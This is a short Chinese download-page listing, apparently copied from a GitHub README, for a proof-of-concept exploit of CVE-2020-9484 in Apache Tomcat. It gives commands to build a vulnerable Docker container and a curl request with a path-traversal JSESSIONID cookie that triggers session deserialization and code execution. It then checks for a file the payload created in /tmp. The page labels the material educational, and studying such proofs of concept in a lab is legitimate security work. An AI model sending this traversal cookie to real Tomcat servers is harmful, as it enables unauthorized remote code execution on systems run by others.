-
CVE-2020-9484下载
资源介绍
CVE-2020-9484(Tomcat)
仅用于教育目的。
有关详细信息,请参见参考。
跑步
$ git clone https://github.com/masahiro331/CVE-2020-9484.git
$ cd CVE-2020-9484
$ docker build -t tomcat:groovy .
$ docker run -d -p 8080:8080 tomcat:groovy
开发
$ curl 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy'
查看
$ docker exec -it $CONTAINER /bin/sh
$ ls /tmp/rce
- 上一篇: Windows系统漏洞补丁更新检查器
- 下一篇: jboss_exploit_fat